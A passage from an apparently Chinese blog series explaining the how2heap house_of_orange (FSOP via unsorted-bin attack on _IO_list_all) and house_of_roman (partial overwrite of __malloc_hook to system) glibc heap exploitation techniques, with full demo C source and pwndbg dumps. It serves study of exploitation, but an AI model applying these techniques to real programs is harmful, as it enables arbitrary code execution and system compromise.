<p>p1指向0x400大小的一块内存,同时观察下top chunk,可以看到此时topchunk就在p1+0x3f0(0x400 - 0x10)的位置,其大小为0x20c01(0x21000-0x400):</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/4gx p1 - 0x10 0x602000: 0x0000000000000000 0x0000000000000401 0x602010: 0x0000000000000000 0x0000000000000000 pwndbg&gt; x/4gx p1+0x3f0 0x602400: 0x0000000000000000 0x0000000000020c01 0x602410: 0x0000000000000000 0x0000000000000000 </code></pre></div></div> <p>此时,更改topchunk的大小,该大小必须页对齐,同时prev_inuse被置为1。这样做的目的是为了下一次malloc一定大小(大于topchunk更改后的大小)时,可以将剩下的top chunk释放掉,插入unsorted bin。</p> <p>在此之后,top指向了topchunk,大小改为了0xc01:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/4gx top 0x602400: 0x0000000000000000 0x0000000000000c01 0x602410: 0x0000000000000000 0x0000000000000000 </code></pre></div></div> <p>p2指向0x1000大小的内存,由于0x1000 &gt; 0xc01,所以系统会通过mmap再请求一块内存页。同时,0x602400开始的top chunk被移入了unsorted bin中。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>unsortedbin all: 0x602400 —▸ 0x7ffff7dd1b78 <span class="o">(</span>main_arena+88<span class="o">)</span> ◂— 0x602400 pwndbg&gt; x/2gx p2 - 0x10 0x623000: 0x0000000000000000 0x0000000000001011 </code></pre></div></div> <p>至此,第一阶段获取unsortedbin已经完成了。在进行下一步之前需要理解FSOP的概念,当程序遇到一些原因退出时,会通过<code class="language-plaintext highlighter-rouge">_IO_flush_all_lockp</code>函数刷新IO,其流程主要是通过遍历IO_list_all的链表,每次遍历都会调用该FILE结构体中vtable表的<code class="language-plaintext highlighter-rouge">_IO_OVERFLOW</code>函数来刷新缓存。我们的目的也就是通过unsorted bin来改写IO_list_all指针,使其指向main_arena中的位置,并在对应的chain字段中赋值我们伪造的FILE结构体,最后通过调用该结构体中的vtable中的伪造函数来完成利用。以下是源码中遍历的部分:</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">_IO_flush_all_lockp</span> <span class="p">(</span><span class="kt">int</span> <span class="n">do_lock</span><span class="p">)</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">result</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="k">struct</span> <span class="n">_IO_FILE</span> <span class="o">*</span><span class="n">fp</span><span class="p">;</span> <span class="kt">int</span> <span class="n">last_stamp</span><span class="p">;</span> <span class="n">fp</span> <span class="o">=</span> <span class="p">(</span><span class="n">_IO_FILE</span> <span class="o">*</span><span class="p">)</span> <span class="n">_IO_list_all</span><span class="p">;</span> <span class="k">while</span> <span class="p">(</span><span class="n">fp</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span> <span class="p">...</span> <span class="k">if</span> <span class="p">(((</span><span class="n">fp</span><span class="o">-&gt;</span><span class="n">_mode</span> <span class="o">&lt;=</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">fp</span><span class="o">-&gt;</span><span class="n">_IO_write_ptr</span> <span class="o">&gt;</span> <span class="n">fp</span><span class="o">-&gt;</span><span class="n">_IO_write_base</span><span class="p">)</span> <span class="cp">#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T </span> <span class="o">||</span> <span class="p">(</span><span class="n">_IO_vtable_offset</span> <span class="p">(</span><span class="n">fp</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">fp</span><span class="o">-&gt;</span><span class="n">_mode</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="n">fp</span><span class="o">-&gt;</span><span class="n">_wide_data</span><span class="o">-&gt;</span><span class="n">_IO_write_ptr</span> <span class="o">&gt;</span> <span class="n">fp</span><span class="o">-&gt;</span><span class="n">_wide_data</span><span class="o">-&gt;</span><span class="n">_IO_write_base</span><span class="p">))</span> <span class="cp">#endif </span> <span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">_IO_OVERFLOW</span> <span class="p">(</span><span class="n">fp</span><span class="p">,</span> <span class="n">EOF</span><span class="p">)</span> <span class="o">==</span> <span class="n">EOF</span><span class="p">)</span> <span class="c1">// 刷新</span> <span class="n">result</span> <span class="o">=</span> <span class="n">EOF</span><span class="p">;</span> <span class="n">fp</span> <span class="o">=</span> <span class="n">fp</span><span class="o">-&gt;</span><span class="n">_chain</span><span class="p">;</span> <span class="c1">// 遍历链表</span> <span class="p">}</span> <span class="p">...</span> <span class="p">}</span> </code></pre></div></div> <p>根据<code class="language-plaintext highlighter-rouge">_IO_list_all</code>距离unsorted bin的偏移为0x9a8可以计算出<code class="language-plaintext highlighter-rouge">_IO_list_all</code>的地址:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/4gx top 0x602400: 0x0000000000000000 0x0000000000000be1 0x602410: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 pwndbg&gt; x/x 0x00007ffff7dd1b78 + 0x9a8 0x7ffff7dd2520 &lt;_IO_list_all&gt;: 0x00007ffff7dd2540 </code></pre></div></div> <p>当下次分配需要从unsorted bin中取free chunk的时候,顶部的free chunk-&gt;bk-&gt;fd会被改写为指向unsorted bin,所以我们将__IO_list_all - 0x10放置在top-&gt;bk的位置,使其指向的地址被改写。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/4gx top 0x602400: 0x0000000000000000 0x0000000000000be1 0x602410: 0x00007ffff7dd1b78 0x00007ffff7dd2510 </code></pre></div></div> <p>接下来就是构造fake FILE结构体了。</p> <p>首先将top首地址内容改为<code class="language-plaintext highlighter-rouge">/bin/sh</code>。其次,我们通过将top的size字段改为0x61,来使下一次malloc时将这个top塞入_IO_list_all + 0x68的位置,即FILE-&gt;_chain的偏移,<code class="language-plaintext highlighter-rouge">_IO_flush_all_lockp</code>就是通过这个字段来遍历的。改大小的原因是smallbin<a href="90 ~ 98">4</a>正好在unsortedbin+0x68的位置,而下一次malloc时unsortedbin如果发现这个chunk不满足请求大小,就会将其放入对应大小的bin中。所以通过将size改为0x61,可以将top移入到smallbin[4]的位置。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/4gx top 0x602400: 0x0068732f6e69622f 0x0000000000000061 0x602410: 0x00007ffff7dd1b78 0x00007ffff7dd2510 </code></pre></div></div> <p>接下来为了使<code class="language-plaintext highlighter-rouge">_IO_overflow_</code>函数能够被调用,还需要更改两个参数,以绕过条件检查:</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">if</span> <span class="p">(((</span><span class="n">fp</span><span class="o">-&gt;</span><span class="n">_mode</span> <span class="o">&lt;=</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">fp</span><span class="o">-&gt;</span><span class="n">_IO_write_ptr</span> <span class="o">&gt;</span> <span class="n">fp</span><span class="o">-&gt;</span><span class="n">_IO_write_base</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">_IO_vtable_offset</span> <span class="p">(</span><span class="n">fp</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">fp</span><span class="o">-&gt;</span><span class="n">_mode</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="n">fp</span><span class="o">-&gt;</span><span class="n">_wide_data</span><span class="o">-&gt;</span><span class="n">_IO_write_ptr</span> <span class="o">&gt;</span> <span class="n">fp</span><span class="o">-&gt;</span><span class="n">_wide_data</span><span class="o">-&gt;</span><span class="n">_IO_write_base</span><span class="p">))</span> <span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">_IO_OVERFLOW</span> <span class="p">(</span><span class="n">fp</span><span class="p">,</span> <span class="n">EOF</span><span class="p">)</span> <span class="o">==</span> <span class="n">EOF</span><span class="p">)</span> <span class="n">result</span> <span class="o">=</span> <span class="n">EOF</span><span class="p">;</span> </code></pre></div></div> <p>主要是满足两个条件:</p> <ol> <li>fp-&gt;_mode &lt;=0</li> <li>fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base</li> </ol> <p>所以代码中将mode置为0,_IO_write_base置为2,_IO_write_ptr置为3</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/10gx top 0x602400: 0x0068732f6e69622f 0x0000000000000061 0x602410: 0x00007ffff7dd1b78 0x00007ffff7dd2510 0x602420: 0x0000000000000002 0x0000000000000003 </code></pre></div></div> <p>最后,伪造vtable。可以看到,vtable的偏移是sizeof(FILE),即0xd8:</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">_IO_FILE_plus</span> <span class="p">{</span> <span class="n">_IO_FILE</span> <span class="n">file</span><span class="p">;</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">_IO_jump_t</span> <span class="o">*</span><span class="n">vtable</span><span class="p">;</span> <span class="p">};</span> </code></pre></div></div> <p>而 _IO_overflow_在vtable中的index是3,所以在top[12]的位置构造了一个jump_table,将jump_table[3]赋值为<code class="language-plaintext highlighter-rouge">winner</code>函数的地址,最后将jump_table的地址赋值给top + 0xd8的位置。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/x top + <span class="o">(</span>0xd8 / 8<span class="o">)</span> 0x6024d8: 0x0000000000602460 pwndbg&gt; x/4gx 0x0000000000602460 0x602460: 0x0000000000000000 0x0000000000000000 0x602470: 0x0000000000000000 0x00000000004007df pwndbg&gt; x/x 0x4007df 0x4007df &lt;winner&gt;: 0x10ec8348e5894855 </code></pre></div></div> <p>最后的最后,<code class="language-plaintext highlighter-rouge">malloc(10)</code>,malloc在将unsorted bin的chunk移入smallbin并且完成_IO_list_all的改写后,会对chunk的size进行检查:</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">if</span> <span class="p">(</span><span class="n">__glibc_unlikely</span> <span class="p">(</span><span class="n">size</span> <span class="o">&lt;=</span> <span class="mi">2</span> <span class="o">*</span> <span class="n">SIZE_SZ</span><span class="p">)</span> <span class="o">||</span> <span class="n">__glibc_unlikely</span> <span class="p">(</span><span class="n">size</span> <span class="o">&gt;</span> <span class="n">av</span><span class="o">-&gt;</span><span class="n">system_mem</span><span class="p">))</span> </code></pre></div></div> <p>而我们伪造的chunk并不满足条件,在退出前调用<code class="language-plaintext highlighter-rouge">_IO_flush_all_lockp</code>遍历刷新IO,最终调用winner函数,得到shell。</p> <div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; bt <span class="c">#0 winner (ptr=0x602400 "/bin/sh") at glibc_2.23/house_of_orange.c:269</span> <span class="c">#1 0x00007ffff7a891a6 in _IO_flush_all_lockp (do_lock=do_lock@entry=0) at genops.c:786</span> <span class="c">#2 0x00007ffff7a43fcd in __GI_abort () at abort.c:74</span> <span class="c">#3 0x00007ffff7a847fa in __libc_message (do_abort=2, fmt=fmt@entry=0x7ffff7b9df98 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175</span> <span class="c">#4 0x00007ffff7a8f15e in malloc_printerr (ar_ptr=0x7ffff7dd1b20 &lt;main_arena&gt;, ptr=0x7ffff7dd2520 &lt;_IO_list_all&gt;, str=0x7ffff7b9adff "malloc(): memory corruption", action=&lt;optimized out&gt;) at malloc.c:5020</span> <span class="c">#5 _int_malloc (av=av@entry=0x7ffff7dd1b20 &lt;main_arena&gt;, bytes=bytes@entry=10) at malloc.c:3481</span> <span class="c">#6 0x00007ffff7a911d4 in __GI___libc_malloc (bytes=10) at malloc.c:2920</span> <span class="c">#7 0x00000000004007d8 in main () at glibc_2.23/house_of_orange.c:257</span> <span class="c">#8 0x00007ffff7a2d840 in __libc_start_main (main=0x4006a6 &lt;main&gt;, argc=1, argv=0x7fffffffde98, init=&lt;optimized out&gt;, fini=&lt;optimized out&gt;, rtld_fini=&lt;optimized out&gt;, stack_end=0x7fffffffde88) at ../csu/libc-start.c:291</span> <span class="c">#9 0x00000000004005d9 in _start ()</span> </code></pre></div></div> <h3 id="reference">Reference</h3> <p><a href="https://outflux.net/blog/archives/2011/12/22/abusing-the-file-structure/">FILE structure</a></p> <p><a href="https://ray-cp.github.io/archivers/IO_FILE_vtable_hajack_and_fsop">FSOP</a></p> Sat, 02 Jan 2021 00:00:00 +0000 https://clot.github.io//how2heap_house_of_orange https://clot.github.io/how2heap_house_of_orange Heap Exploitation - how2heap house_of_roman <h2 id="house_of_roman">house_of_roman</h2> <p>该程序涉及到的攻击方法可以绕过ASLR,并且没有地方leak libc地址时候。整个程序被分为5个步骤:</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">main</span><span class="p">(){</span> <span class="n">init</span><span class="p">();</span> <span class="c1">// 1</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Step 1: Point fastbin chunk to __malloc_hook</span><span class="se">\n\n</span><span class="s">"</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Setting up chunks for relative overwrites with heap feng shui.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="c1">// Use this as the UAF chunk later to edit the heap pointer later to point to the LibC value. </span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">fastbin_victim</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x60</span><span class="p">);</span> <span class="c1">// Allocate this in order to have good alignment for relative </span> <span class="c1">// offsets later (only want to overwrite a single byte to prevent </span> <span class="c1">// 4 bits of brute on the heap).</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x80</span><span class="p">);</span> <span class="c1">// Offset 0x100</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">main_arena_use</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x80</span><span class="p">);</span> <span class="c1">// Offset 0x190</span> <span class="c1">// This ptr will be used for a relative offset on the 'main_arena_use' chunk</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">relative_offset_heap</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x60</span><span class="p">);</span> <span class="c1">// Free the chunk to put it into the unsorted_bin. </span> <span class="c1">// This chunk will have a pointer to main_arena + 0x68 in both the fd and bk pointers.</span> <span class="n">free</span><span class="p">(</span><span class="n">main_arena_use</span><span class="p">);</span> <span class="c1">// 2</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Allocate chunk that has a pointer to LibC main_arena inside of fd ptr.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="c1">//Offset 0x100. Has main_arena + 0x68 in fd and bk.</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">fake_libc_chunk</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x60</span><span class="p">);</span> <span class="c1">//// NOTE: This is NOT part of the exploit... \\\</span> <span class="c1">// The __malloc_hook is calculated in order for the offsets to be found so that this exploit works on a handful of versions of GLibC. </span> <span class="kt">long</span> <span class="kt">long</span> <span class="n">__malloc_hook</span> <span class="o">=</span> <span class="p">((</span><span class="kt">long</span><span class="o">*</span><span class="p">)</span><span class="n">fake_libc_chunk</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="o">-</span> <span class="mh">0xe8</span><span class="p">;</span> <span class="c1">// We need the filler because the overwrite below needs </span> <span class="c1">// to have a ptr in the fd slot in order to work. </span> <span class="c1">//Freeing this chunk puts a chunk in the fd slot of 'fastbin_victim' to be used later. </span> <span class="n">free</span><span class="p">(</span><span class="n">relative_offset_heap</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">"\ Overwrite the first byte of a heap chunk in order to point the fastbin chunk</span><span class="se">\n</span><span class="s">\ to the chunk with the LibC address</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">"\ Fastbin 0x70 now looks like this:</span><span class="se">\n</span><span class="s">\ heap_addr -&gt; heap_addr2 -&gt; LibC_main_arena</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">fastbin_victim</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x00</span><span class="p">;</span> <span class="c1">// The location of this is at 0x100. But, we only want to overwrite the first byte. So, we put 0x0 for this.</span> <span class="c1">// 3</span> <span class="n">puts</span><span class="p">(</span><span class="s">"\ Use a relative overwrite on the main_arena pointer in the fastbin.</span><span class="se">\n</span><span class="s">\ Point this close to __malloc_hook in order to create a fake fastbin chunk</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="kt">long</span> <span class="kt">long</span> <span class="n">__malloc_hook_adjust</span> <span class="o">=</span> <span class="n">__malloc_hook</span> <span class="o">-</span> <span class="mh">0x23</span><span class="p">;</span> <span class="c1">// We substract 0x23 from the malloc because we want to use a 0x7f as a valid fastbin chunk size.</span> <span class="c1">// The relative overwrite</span> <span class="kt">int8_t</span> <span class="n">byte1</span> <span class="o">=</span> <span class="p">(</span><span class="n">__malloc_hook_adjust</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xff</span><span class="p">;</span> <span class="kt">int8_t</span> <span class="n">byte2</span> <span class="o">=</span> <span class="p">(</span><span class="n">__malloc_hook_adjust</span> <span class="o">&amp;</span> <span class="mh">0xff00</span><span class="p">)</span> <span class="o">&gt;&gt;</span> <span class="mi">8</span><span class="p">;</span> <span class="n">fake_libc_chunk</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">byte1</span><span class="p">;</span> <span class="c1">// Least significant bytes of the address.</span> <span class="n">fake_libc_chunk</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">byte2</span><span class="p">;</span> <span class="c1">// The upper most 4 bits of this must be brute forced in a real attack.</span> <span class="c1">// Two filler chunks prior to the __malloc_hook chunk in the fastbin. </span> <span class="c1">// These are fastbin_victim and fake_libc_chunk.</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Get the fake chunk pointing close to __malloc_hook</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">"\ In a real exploit, this would fail 15/16 times</span><span class="se">\n</span><span class="s">\ because of the final half byet of the malloc_hook being random</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x60</span><span class="p">);</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x60</span><span class="p">);</span> <span class="c1">// If the 4 bit brute force did not work, this will crash because </span> <span class="c1">// of the chunk size not matching the bin for the chunk. </span> <span class="c1">// Otherwise, the next step of the attack can begin.</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">malloc_hook_chunk</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x60</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Passed step 1 =)</span><span class="se">\n\n\n</span><span class="s">"</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">"\ Start Step 2: Unsorted_bin attack</span><span class="se">\n\n</span><span class="s">\ The unsorted bin attack gives us the ability to write a</span><span class="se">\n</span><span class="s">\ large value to ANY location. But, we do not control the value</span><span class="se">\n</span><span class="s">\ This value is always main_arena + 0x68. </span><span class="se">\n</span><span class="s">\ We point the unsorted_bin attack to __malloc_hook for a </span><span class="se">\n</span><span class="s">\ relative overwrite later.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="c1">// 4</span> <span class="c1">// Get the chunk to corrupt. Add another ptr in order to prevent consolidation upon freeing.</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">unsorted_bin_ptr</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x80</span><span class="p">);</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x30</span><span class="p">);</span> <span class="c1">// Don't want to consolidate</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Put chunk into unsorted_bin</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="c1">// Free the chunk to create the UAF</span> <span class="n">free</span><span class="p">(</span><span class="n">unsorted_bin_ptr</span><span class="p">);</span> <span class="cm">/* /// NOTE: The last 4 bits of byte2 would have been brute forced earlier. \\\ However, for the sake of example, this has been calculated dynamically. */</span> <span class="n">__malloc_hook_adjust</span> <span class="o">=</span> <span class="n">__malloc_hook</span> <span class="o">-</span> <span class="mh">0x10</span><span class="p">;</span> <span class="c1">// This subtract 0x10 is needed because of the chunk-&gt;fd doing the actual overwrite on the unsorted_bin attack.</span> <span class="n">byte1</span> <span class="o">=</span> <span class="p">(</span><span class="n">__malloc_hook_adjust</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xff</span><span class="p">;</span> <span class="n">byte2</span> <span class="o">=</span> <span class="p">(</span><span class="n">__malloc_hook_adjust</span> <span class="o">&amp;</span> <span class="mh">0xff00</span><span class="p">)</span> <span class="o">&gt;&gt;</span> <span class="mi">8</span><span class="p">;</span> <span class="c1">// Use another relative offset to overwrite the ptr of the chunk-&gt;bk pointer.</span> <span class="c1">// From the previous brute force (4 bits from before) we </span> <span class="c1">// know where the location of this is at. It is 5 bytes away from __malloc_hook.</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Overwrite last two bytes of the chunk to point to __malloc_hook</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">unsorted_bin_ptr</span><span class="p">[</span><span class="mi">8</span><span class="p">]</span> <span class="o">=</span> <span class="n">byte1</span><span class="p">;</span> <span class="c1">// Byte 0 of bk. </span> <span class="c1">// //// NOTE: Normally, the second half of the byte would HAVE to be brute forced. However, for the sake of example, we set this in order to make the exploit consistent. ///</span> <span class="n">unsorted_bin_ptr</span><span class="p">[</span><span class="mi">9</span><span class="p">]</span> <span class="o">=</span> <span class="n">byte2</span><span class="p">;</span> <span class="c1">// Byte 1 of bk. The second 4 bits of this was brute forced earlier, the first 4 bits are static.</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Trigger the unsorted_bin attack</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x80</span><span class="p">);</span> <span class="c1">// Trigger the unsorted_bin attack to overwrite __malloc_hook with main_arena + 0x68</span> <span class="kt">long</span> <span class="kt">long</span> <span class="n">system_addr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">long</span> <span class="kt">long</span><span class="p">)</span><span class="n">dlsym</span><span class="p">(</span><span class="n">RTLD_NEXT</span><span class="p">,</span> <span class="s">"system"</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Passed step 2 =)</span><span class="se">\n\n\n</span><span class="s">"</span><span class="p">);</span> <span class="cm">/* Step 3: Set __malloc_hook to system The chunk itself is allocated 19 bytes away from __malloc_hook. So, we use a realtive overwrite (again) in order to partially overwrite the main_arena pointer (from unsorted_bin attack) to point to system. In a real attack, the first 12 bits are static (per version). But, after that, the next 12 bits must be brute forced. /// NOTE: For the sake of example, we will be setting these values, instead of brute forcing them. \\\ */</span> <span class="c1">// 5</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Step 3: Set __malloc_hook to system/one_gadget</span><span class="se">\n\n</span><span class="s">"</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">"\ Now that we have a pointer to LibC inside of __malloc_hook (from step 2), </span><span class="se">\n</span><span class="s">\ we can use a relative overwrite to point this to system or a one_gadget.</span><span class="se">\n</span><span class="s">\ Note: In a real attack, this would be where the last 8 bits of brute forcing</span><span class="se">\n</span><span class="s">\ comes from.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">malloc_hook_chunk</span><span class="p">[</span><span class="mi">19</span><span class="p">]</span> <span class="o">=</span> <span class="n">system_addr</span> <span class="o">&amp;</span> <span class="mh">0xff</span><span class="p">;</span> <span class="c1">// The first 12 bits are static (per version).</span> <span class="n">malloc_hook_chunk</span><span class="p">[</span><span class="mi">20</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">system_addr</span> <span class="o">&gt;&gt;</span> <span class="mi">8</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xff</span><span class="p">;</span> <span class="c1">// The last 4 bits of this must be brute forced (done previously already).</span> <span class="n">malloc_hook_chunk</span><span class="p">[</span><span class="mi">21</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">system_addr</span> <span class="o">&gt;&gt;</span> <span class="mi">16</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xff</span><span class="p">;</span> <span class="c1">// The last byte is the remaining 8 bits that must be brute forced.</span> <span class="n">malloc_hook_chunk</span><span class="p">[</span><span class="mi">22</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">system_addr</span> <span class="o">&gt;&gt;</span> <span class="mi">24</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xff</span><span class="p">;</span> <span class="c1">// If the gap is between the data and text section is super wide, this is also needed. Just putting this in to be safe.</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Pop Shell!"</span><span class="p">);</span> <span class="n">malloc</span><span class="p">((</span><span class="kt">long</span> <span class="kt">long</span><span class="p">)</span><span class="n">shell</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <p>第一步主要准备好之后要利用的几个chunk,free了其中一个插入unsortedbin。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; heap Allocated chunk | PREV_INUSE Addr: 0x603000 Size: 0x71 Allocated chunk | PREV_INUSE Addr: 0x603070 Size: 0x91 Free chunk <span class="o">(</span>unsortedbin<span class="o">)</span> | PREV_INUSE Addr: 0x603100 Size: 0x91 fd: 0x7ffff7bcdb78 bk: 0x7ffff7bcdb78 Allocated chunk Addr: 0x603190 Size: 0x70 Top chunk | PREV_INUSE Addr: 0x603200 Size: 0x20e01 </code></pre></div></div> <p>第二步通过UAF来获取libc地址</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/4gx fake_libc_chunk 0x603110: 0x00007ffff7bcdbf8 0x00007ffff7bcdbf8 0x603120: 0x0000000000000000 0x0000000000000000 </code></pre></div></div> <p>然后通过两次free在fastbin 0x70的位置插入两个chunk,这步是为了将<code class="language-plaintext highlighter-rouge">fake_libc_chunk</code>插入fastbin做准备。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/x __malloc_hook 0x7ffff7bcdb10 &lt;__malloc_hook&gt;: 0x0000000000000000 </code></pre></div></div> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; fastbins fastbins 0x20: 0x0 0x30: 0x0 0x40: 0x0 0x50: 0x0 0x60: 0x0 0x70: 0x603000 —▸ 0x603190 ◂— 0x0 </code></pre></div></div> <p>此时bin的布局如下:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; bins fastbins 0x20: 0x0 0x30: 0x0 0x40: 0x0 0x50: 0x0 0x60: 0x0 0x70: 0x603000 —▸ 0x603190 ◂— 0x0 0x80: 0x0 unsortedbin all: 0x603170 —▸ 0x7ffff7bcdb78 <span class="o">(</span>main_arena+88<span class="o">)</span> ◂— 0x603170 /<span class="k">*</span> <span class="s1">'p1`'</span> <span class="k">*</span>/ smallbins empty largebins </code></pre></div></div> <p>通过修改<code class="language-plaintext highlighter-rouge">fastbin_victim-&gt;fd</code>的低字节,把<code class="language-plaintext highlighter-rouge">fake_libc_chunk</code>插入fastbin:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/x fake_libc_chunk 0x603110: 0x00007ffff7bcdbf8 pwndbg&gt; x/x fastbin_victim 0x603010: 0x0000000000603190 pwndbg&gt; fastbins fastbins ... 0x60: 0x0 0x70: 0x603000 —▸ 0x603100 —▸ 0x7ffff7bcdbf8 <span class="o">(</span>main_arena+216<span class="o">)</span> ◂— 0x7ffff7bcdbf8 </code></pre></div></div> <p>第三步,获取<code class="language-plaintext highlighter-rouge">malloc_hook - 0x23</code>的位置,因为这里可以构成一个<code class="language-plaintext highlighter-rouge">0x7f</code>大小的chunk,为了之后链入fastbin。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/4gx __malloc_hook - 0x23 0x7ffff7bcdaed &lt;_IO_wide_data_0+301&gt;: 0xfff7bcc260000000 0x000000000000007f 0x7ffff7bcdafd: 0xfff788eea0000000 0xfff788ea7000007f </code></pre></div></div> <p>使<code class="language-plaintext highlighter-rouge">fake_libc_chunk[0]</code>指向<code class="language-plaintext highlighter-rouge">__malloc_hook_adjust</code>,修改低2个字节,其中<code class="language-plaintext highlighter-rouge">db</code>中的<code class="language-plaintext highlighter-rouge">b</code>真实情况下需要brute force,1/16成功率。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#修改前:</span> pwndbg&gt; x/x __malloc_hook_adjust 0x7ffff7bcdaed &lt;_IO_wide_data_0+301&gt;: 0xfff7bcc260000000 pwndbg&gt; x/4gx fake_libc_chunk 0x603110: 